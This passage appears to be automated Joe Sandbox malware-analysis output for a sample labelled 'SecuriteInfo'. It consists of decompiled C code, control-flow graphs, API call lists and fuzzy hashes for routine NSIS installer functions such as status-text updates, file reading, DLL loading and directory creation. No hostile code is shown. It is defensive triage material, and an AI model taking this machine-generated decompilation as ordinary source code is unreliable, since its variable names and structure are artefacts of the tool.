                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp$C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll$Call
                                                                        • API String ID: 1941528284-1025221552
                                                                        • Opcode ID: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
                                                                        • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                        • Opcode Fuzzy Hash: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
                                                                        • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 800 4056ca-4056df 801 4056e5-4056f6 800->801 802 405796-40579a 800->802 803 405701-40570d lstrlenW 801->803 804 4056f8-4056fc call 4066a5 801->804 806 40572a-40572e 803->806 807 40570f-40571f lstrlenW 803->807 804->803 809 405730-405737 SetWindowTextW 806->809 810 40573d-405741 806->810 807->802 808 405721-405725 lstrcatW 807->808 808->806 809->810 811 405743-405785 SendMessageW * 3 810->811 812 405787-405789 810->812 811->812 812->802 813 40578b-40578e 812->813 813->802
                                                                        C-Code - Quality: 100%
                                                                        			E004056CA(signed int _a4, WCHAR* _a8) {
                                                                        				struct HWND__* _v8;
                                                                        				signed int _v12;
                                                                        				WCHAR* _v32;
                                                                        				long _v44;
                                                                        				int _v48;
                                                                        				void* _v52;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				WCHAR* _t27;
                                                                        				signed int _t28;
                                                                        				long _t29;
                                                                        				signed int _t37;
                                                                        				signed int _t38;
                                                                        
                                                                        				_t27 =  *0x429244;
                                                                        				_v8 = _t27;
                                                                        				if(_t27 != 0) {
                                                                        					_t37 =  *0x42a314;
                                                                        					_v12 = _t37;
                                                                        					_t38 = _t37 & 0x00000001;
                                                                        					if(_t38 == 0) {
                                                                        						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                                        					}
                                                                        					_t27 = lstrlenW(0x422728);
                                                                        					_a4 = _t27;
                                                                        					if(_a8 == 0) {
                                                                        						L6:
                                                                        						if((_v12 & 0x00000004) == 0) {
                                                                        							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
                                                                        						}
                                                                        						if((_v12 & 0x00000002) == 0) {
                                                                        							_v32 = 0x422728;
                                                                        							_v52 = 1;
                                                                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                        							_v44 = 0;
                                                                        							_v48 = _t29 - _t38;
                                                                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                        						}
                                                                        						if(_t38 != 0) {
                                                                        							_t28 = _a4;
                                                                        							0x422728[_t28] = 0;
                                                                        							return _t28;
                                                                        						}
                                                                        					} else {
                                                                        						_t27 = lstrlenW(_a8) + _a4;
                                                                        						if(_t27 < 0x1000) {
                                                                        							_t27 = lstrcatW(0x422728, _a8);
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t27;
                                                                        			}

















                                                                        0x004056d0
                                                                        0x004056da
                                                                        0x004056df
                                                                        0x004056e5
                                                                        0x004056f0
                                                                        0x004056f3
                                                                        0x004056f6
                                                                        0x004056fc
                                                                        0x004056fc
                                                                        0x00405702
                                                                        0x0040570a
                                                                        0x0040570d
                                                                        0x0040572a
                                                                        0x0040572e
                                                                        0x00405737
                                                                        0x00405737
                                                                        0x00405741
                                                                        0x0040574a
                                                                        0x00405756
                                                                        0x0040575d
                                                                        0x00405761
                                                                        0x00405764
                                                                        0x00405777
                                                                        0x00405785
                                                                        0x00405785
                                                                        0x00405789
                                                                        0x0040578b
                                                                        0x0040578e
                                                                        0x00000000
                                                                        0x0040578e
                                                                        0x0040570f
                                                                        0x00405717
                                                                        0x0040571f
                                                                        0x00405725
                                                                        0x00000000
                                                                        0x00405725
                                                                        0x0040571f
                                                                        0x0040570d
                                                                        0x0040579a

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                        • lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,004030A8), ref: 00405725
                                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll), ref: 00405737
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                          • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                          • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000), ref: 004068A4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll
                                                                        • API String ID: 1495540970-3343829044
                                                                        • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                        • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                        • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                        • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 814 4026ec-402705 call 402d84 817 402c2a-402c2d 814->817 818 40270b-402712 814->818 821 402c33-402c39 817->821 819 402714 818->819 820 402717-40271a 818->820 819->820 823 402720-40272f call 4065c8 820->823 824 40287e-402886 820->824 823->824 827 402735 823->827 824->817 828 40273b-40273f 827->828 829 4027d4-4027d7 828->829 830 402745-402760 ReadFile 828->830 832 4027d9-4027dc 829->832 833 4027ef-4027ff call 4061db 829->833 830->824 831 402766-40276b 830->831 831->824 835 402771-40277f 831->835 832->833 836 4027de-4027e9 call 406239 832->836 833->824 841 402801 833->841 838 402785-402797 MultiByteToWideChar 835->838 839 40283a-402846 call 4065af 835->839 836->824 836->833 838->841 842 402799-40279c 838->842 839->821 845 402804-402807 841->845 846 40279e-4027a9 842->846 845->839 848 402809-40280e 845->848 846->845 849 4027ab-4027d0 SetFilePointer MultiByteToWideChar 846->849 850 402810-402815 848->850 851 40284b-40284f 848->851 849->846 852 4027d2 849->852 850->851 853 402817-40282a 850->853 854 402851-402855 851->854 855 40286c-402878 SetFilePointer 851->855 852->841 853->824 856 40282c-402832 853->856 857 402857-40285b 854->857 858 40285d-40286a 854->858 855->824 856->828 859 402838 856->859 857->855 857->858 858->824 859->824
                                                                        C-Code - Quality: 87%
                                                                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t72;
                                                                        				void* _t76;
                                                                        				void* _t79;
                                                                        
                                                                        				_t72 = __edx;
                                                                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                        				_t65 = 2;
                                                                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                        				_t66 = E00402D84(_t65);
                                                                        				_t79 = _t66 - 1;
                                                                        				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                        				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                        				if(_t79 < 0) {
                                                                        					L36:
                                                                        					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                        				} else {
                                                                        					__ecx = 0x3ff;
                                                                        					if(__eax > 0x3ff) {
                                                                        						 *(__ebp - 0x44) = 0x3ff;
                                                                        					}
                                                                        					if( *__edi == __bx) {
                                                                        						L34:
                                                                        						__ecx =  *(__ebp - 0xc);
                                                                        						__eax =  *(__ebp - 8);
                                                                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                        						if(_t79 == 0) {
                                                                        							 *(_t76 - 4) = 1;
                                                                        						}
                                                                        						goto L36;
                                                                        					} else {
                                                                        						 *(__ebp - 0x38) = __ebx;
                                                                        						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                                        						if( *(__ebp - 0x44) > __ebx) {
                                                                        							do {
                                                                        								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                        									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                                        										__eax = __ebp - 0x50;
                                                                        										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                        											goto L34;
                                                                        										} else {
                                                                        											goto L21;
                                                                        										}
                                                                        									} else {
                                                                        										goto L34;
                                                                        									}
                                                                        								} else {
                                                                        									__eax = __ebp - 0x40;
                                                                        									_push(__ebx);
                                                                        									_push(__ebp - 0x40);
                                                                        									__eax = 2;
                                                                        									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                        									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
                                                                        									if(__eax == 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										__ecx =  *(__ebp - 0x40);
                                                                        										if(__ecx == __ebx) {
                                                                        											goto L34;
                                                                        										} else {
                                                                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                        											 *(__ebp - 0x4c) = __ecx;
                                                                        											 *(__ebp - 0x50) = __eax;
                                                                        											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                        												L28:
                                                                        												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                        											} else {
                                                                        												__ebp - 0x50 = __ebp + 0xa;
                                                                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                        													L21:
                                                                        													__eax =  *(__ebp - 0x50);
                                                                        												} else {
                                                                        													__edi =  *(__ebp - 0x4c);
                                                                        													__edi =  ~( *(__ebp - 0x4c));
                                                                        													while(1) {
                                                                        														_t22 = __ebp - 0x40;
                                                                        														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                        														__eax = 0xfffd;
                                                                        														 *(__ebp - 0x50) = 0xfffd;
                                                                        														if( *_t22 == 0) {
                                                                        															goto L22;
                                                                        														}
                                                                        														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                        														__edi = __edi + 1;
                                                                        														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
                                                                        														__ebp - 0x50 = __ebp + 0xa;
                                                                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                        															continue;
                                                                        														} else {
                                                                        															goto L21;
                                                                        														}
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												L22:
                                                                        												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                        													goto L28;
                                                                        												} else {
                                                                        													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                        														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                        															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                        															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1); // executed
                                                                        														} else {
                                                                        															__ecx =  *(__ebp - 0xc);
                                                                        															__edx =  *(__ebp - 8);
                                                                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                        														}
                                                                        														goto L34;
                                                                        													} else {
                                                                        														__ecx =  *(__ebp - 0xc);
                                                                        														__edx =  *(__ebp - 8);
                                                                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                        														 *(__ebp - 0x38) = __eax;
                                                                        														if(__ax == __bx) {
                                                                        															goto L34;
                                                                        														} else {
                                                                        															goto L26;
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L37;
                                                                        								L26:
                                                                        								__eax =  *(__ebp - 8);
                                                                        							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                        						}
                                                                        						goto L34;
                                                                        					}
                                                                        				}
                                                                        				L37:
                                                                        				return 0;
                                                                        			}








                                                                        0x004026ec
                                                                        0x004026ee
                                                                        0x004026f1
                                                                        0x004026f3
                                                                        0x004026f6
                                                                        0x004026fb
                                                                        0x004026ff
                                                                        0x00402702
                                                                        0x00402705
                                                                        0x00402c2a
                                                                        0x00402c2d
                                                                        0x0040270b
                                                                        0x0040270b
                                                                        0x00402712
                                                                        0x00402714
                                                                        0x00402714
                                                                        0x0040271a
                                                                        0x0040287e
                                                                        0x0040287e
                                                                        0x00402881
                                                                        0x00402886
                                                                        0x004015b6
                                                                        0x0040292e
                                                                        0x0040292e
                                                                        0x00000000
                                                                        0x00402720
                                                                        0x00402721
                                                                        0x0040272c
                                                                        0x0040272f
                                                                        0x0040273b
                                                                        0x0040273f
                                                                        0x004027d7
                                                                        0x004027ef
                                                                        0x004027ff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402745
                                                                        0x00402745
                                                                        0x00402748
                                                                        0x00402749
                                                                        0x0040274c
                                                                        0x00402751
                                                                        0x00402758
                                                                        0x00402760
                                                                        0x00000000
                                                                        0x00402766
                                                                        0x00402766
                                                                        0x0040276b
                                                                        0x00000000
                                                                        0x00402771
                                                                        0x00402771
                                                                        0x00402779
                                                                        0x0040277c
                                                                        0x0040277f
                                                                        0x0040283a
                                                                        0x00402841
                                                                        0x00402785
                                                                        0x0040278b
                                                                        0x00402797
                                                                        0x00402801
                                                                        0x00402801
                                                                        0x00402799
                                                                        0x00402799
                                                                        0x0040279c
                                                                        0x0040279e
                                                                        0x0040279e
                                                                        0x0040279e
                                                                        0x004027a1
                                                                        0x004027a6
                                                                        0x004027a9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004027ab
                                                                        0x004027ae
                                                                        0x004027b6
                                                                        0x004027c2
                                                                        0x004027d0
                                                                        0x00000000
                                                                        0x004027d2
                                                                        0x00000000
                                                                        0x004027d2
                                                                        0x00000000
                                                                        0x004027d0
                                                                        0x0040279e
                                                                        0x00402804
                                                                        0x00402807
                                                                        0x00000000
                                                                        0x00402809
                                                                        0x0040280e
                                                                        0x0040284f
                                                                        0x00402871
                                                                        0x00402878
                                                                        0x0040285d
                                                                        0x0040285d
                                                                        0x00402860
                                                                        0x00402863
                                                                        0x00402866
                                                                        0x00402866
                                                                        0x00000000
                                                                        0x00402817
                                                                        0x00402817
                                                                        0x0040281a
                                                                        0x0040281d
                                                                        0x00402823
                                                                        0x00402827
                                                                        0x0040282a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040282a
                                                                        0x0040280e
                                                                        0x00402807
                                                                        0x0040277f
                                                                        0x0040276b
                                                                        0x00402760
                                                                        0x00000000
                                                                        0x0040282c
                                                                        0x0040282c
                                                                        0x0040282f
                                                                        0x00402838
                                                                        0x00000000
                                                                        0x0040272f
                                                                        0x0040271a
                                                                        0x00402c33
                                                                        0x00402c39

                                                                        APIs
                                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                          • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                        • String ID: 9
                                                                        • API String ID: 163830602-2366072709
                                                                        • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                        • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                        • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                        • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 860 4069c5-4069e5 GetSystemDirectoryW 861 4069e7 860->861 862 4069e9-4069eb 860->862 861->862 863 4069fc-4069fe 862->863 864 4069ed-4069f6 862->864 866 4069ff-406a32 wsprintfW LoadLibraryExW 863->866 864->863 865 4069f8-4069fa 864->865 865->866
                                                                        C-Code - Quality: 100%
                                                                        			E004069C5(intOrPtr _a4) {
                                                                        				short _v576;
                                                                        				signed int _t13;
                                                                        				struct HINSTANCE__* _t17;
                                                                        				signed int _t19;
                                                                        				void* _t24;
                                                                        
                                                                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                        				if(_t13 > 0x104) {
                                                                        					_t13 = 0;
                                                                        				}
                                                                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                        					_t19 = 1;
                                                                        				} else {
                                                                        					_t19 = 0;
                                                                        				}
                                                                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                        				return _t17;
                                                                        			}








                                                                        0x004069dc
                                                                        0x004069e5
                                                                        0x004069e7
                                                                        0x004069e7
                                                                        0x004069eb
                                                                        0x004069fe
                                                                        0x004069f8
                                                                        0x004069f8
                                                                        0x004069f8
                                                                        0x00406a17
                                                                        0x00406a2b
                                                                        0x00406a32

                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                        • wsprintfW.USER32 ref: 00406A17
                                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-1946221925
                                                                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                        • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                        • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 867 405b99-405be4 CreateDirectoryW 868 405be6-405be8 867->868 869 405bea-405bf7 GetLastError 867->869 870 405c11-405c13 868->870 869->870 871 405bf9-405c0d SetFileSecurityW 869->871 871->868 872 405c0f GetLastError 871->872 872->870
                                                                        C-Code - Quality: 100%
                                                                        			E00405B99(WCHAR* _a4) {
                                                                        				struct _SECURITY_ATTRIBUTES _v16;
                                                                        				struct _SECURITY_DESCRIPTOR _v36;
                                                                        				int _t22;
                                                                        				long _t23;
                                                                        
                                                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                        				_v36.Owner = 0x4083f8;
                                                                        				_v36.Group = 0x4083f8;
                                                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                        				_v16.lpSecurityDescriptor =  &_v36;
                                                                        				_v36.Revision = 1;
                                                                        				_v36.Control = 4;
                                                                        				_v36.Dacl = 0x4083e8;
                                                                        				_v16.nLength = 0xc;
                                                                        				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                        				if(_t22 != 0) {
                                                                        					L1:
                                                                        					return 0;
                                                                        				}
                                                                        				_t23 = GetLastError();
                                                                        				if(_t23 == 0xb7) {
                                                                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                        						goto L1;
                                                                        					}
                                                                        					return GetLastError();
                                                                        				}
                                                                        				return _t23;
                                                                        			}







                                                                        0x00405ba4
                                                                        0x00405ba8
                                                                        0x00405bab
                                                                        0x00405bb1
                                                                        0x00405bb5
                                                                        0x00405bb9
                                                                        0x00405bc1
                                                                        0x00405bc8
                                                                        0x00405bce
                                                                        0x00405bd5
                                                                        0x00405bdc
                                                                        0x00405be4
                                                                        0x00405be6
                                                                        0x00000000
                                                                        0x00405be6
                                                                        0x00405bf0
                                                                        0x00405bf7
                                                                        0x00405c0d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405c0f
                                                                        0x00405c13

                                                                        APIs
                                                                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                        • GetLastError.KERNEL32 ref: 00405BF0
                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                        • GetLastError.KERNEL32 ref: 00405C0F
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3449924974-3936084776
                                                                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                        • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
